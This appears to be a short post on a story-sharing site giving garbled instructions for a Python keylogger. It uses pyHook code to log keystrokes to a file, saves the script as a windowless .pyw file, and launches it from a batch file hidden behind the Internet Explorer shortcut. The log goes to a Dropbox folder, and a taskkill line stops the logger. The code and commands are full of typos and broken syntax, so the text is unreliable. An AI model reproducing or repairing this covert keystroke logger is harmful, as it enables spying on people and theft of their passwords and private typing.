Python Keylogger

8 1 0
                                        

python.org/get it "Modules" (goo.gl/02KLg
import pyHook, pythoncom,sys,logging

file_log = 'C:\\important\\log.txt'

def OnKeyboardEvent (event):
   logging.basicConfig(filename = file_log, level = logging. DEBUG.
    format = '%(message)s'
     chr(event.Ascii
      return True
                                             Save as .pyw
hooks_manager = pyHook.Hook/Manager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
python.PumpMessages()
Batch Files
starts "c:\\important/secrdt_script.pyw" - empty quantion marks
start "c:\Provmgram Files (x86)\InternetExplorer\:explore.exe"
@echo off - on top
launch.bat (all files)
Internet Explorer, go to properties, go to target and enter batch files. Press OK.
log file save in the drop box folder
www.pastebin.com/v9;ELVjU
Close the Keylogger, type this in: taskill /F /IM python w. exe - save all files under exit.bat

Notebook CollectionWhere stories live. Discover now